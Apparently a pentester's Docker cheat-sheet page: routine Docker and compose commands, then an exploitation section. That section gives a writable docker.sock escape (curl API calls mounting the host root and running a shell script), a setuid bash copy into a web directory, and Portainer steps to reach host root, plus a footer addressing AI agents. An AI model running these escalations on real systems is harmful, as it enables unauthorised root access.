# Docker ## 00. Basic ```bash ## ------------------| Container Lifecycle docker run -it ubuntu bash docker run -d nginx docker start docker stop docker restart docker kill docker pause docker unpause ## ------------------| Container Listing / Info docker ps docker ps -a docker ps -q docker inspect docker stats docker top ## ------------------| Container Exec / Access docker exec -it bash docker attach ## ------------------| Logs & Debugging docker logs docker logs -f docker events ## ------------------| Container Cleanup docker stop $(docker ps -aq) docker rm $(docker ps -aq) docker rm -f $(docker ps -aq) ## ------------------| Images docker pull docker push docker images docker rmi docker rmi $(docker images -q) ## ------------------| Build / Tag docker build -t myimage . docker tag myrepo/myimage:tag ## ------------------| Volumes docker volume create myvolume docker volume ls docker volume inspect myvolume docker volume rm myvolume docker volume rm $(docker volume ls -q) ## ------------------| Networks docker network ls docker network create mynetwork docker network inspect mynetwork docker network connect mynetwork docker network disconnect mynetwork docker network rm mynetwork ## ------------------| System Cleanup docker system prune docker system prune -a docker system prune -a --volumes ## ------------------| Docker Compose docker compose up docker compose up -d docker compose down docker compose build docker compose logs docker compose ps ## ------------------| Misc Useful docker version docker info docker system df docker cp :/path /host/path docker cp /host/path :/path ``` * Configurations. ```yaml ## ------------------| docker-compose.yaml version: "3" ## optional since v1.27.0 services: website: ## Service name image: nginx ports: - "8080:80" restart: always ## Alwasys start when machine reboot ## ------------------| Start/Stop ### Start/Run sudo docker-compose up -d ### Stop/Down sudo docker-compose stop sudo docker-compose down ``` * Login ```bash ## ------------------| Normal login docker login ## ------------------| If it has certificate file mkdir -p /etc/docker/certs.d/ cp ca.crt /etc/docker/certs.d//ca.crt docker login cat /etc/docker/daemon.json { "insecure-registries":["docker.registry.htb:443"] } ``` ## 02. Exploitation * Is `Docker Sock` is writable ? ```bash ## ------------------| How to check ls -al /var/run/docker.sock ## ------------------| Web APIs (https://docs.docker.com/engine/api/v1.41/) curl -s --unix-socket /var/run/docker.sock http://localhost/images/json curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json ## ------------------| Expolit chain ### Create new container--> map root drive ### We need to know what image we can use; use following command and get RepoTags value. curl -s --unix-socket /var/run/docker.sock http://localhost/images/json | jq '.[] | .RepoTags[0]' ### Create json object in file !!! Remove comments!!! { "Image" : "sandbox", ## <---- RepoTags value "Cmd" : ["/bin/sh","-c","chroot /mnt sh -c \"bash /tmp/shell.sh\""], ## <---- shell "Binds" : [ "/:/mnt:rw" ] } ### use curl command to create new container curl -X POST -H "Content-Type: application/json" -d @shell.json --unix-socket /var/run/docker.sock http://localhost/containers/create ### Get id value; replace; start curl -X POST --unix-socket /var/run/docker.sock http://localhost/containers//start ``` * Host Share Abuse ```bash root@efaa6f5097ed:~# cp /bin/bash /var/www/html/survey/h4rithd root@efaa6f5097ed:~# chmod 6777 /var/www/html/survey/h4rithd root@efaa6f5097ed:~# ls -l /var/www/html/survey/h4rithd ``` * Privilege Escalation via [Portainer](https://www.portainer.io)

Create new volume with these settings

Select any ID

Copy the sha256 ID value

Paste the value in the image section

Set the console

Set the volume to newly created one

Go inside to the container and click the console button

Here you have root directory

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.h4rithd.com/cloud/docker.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.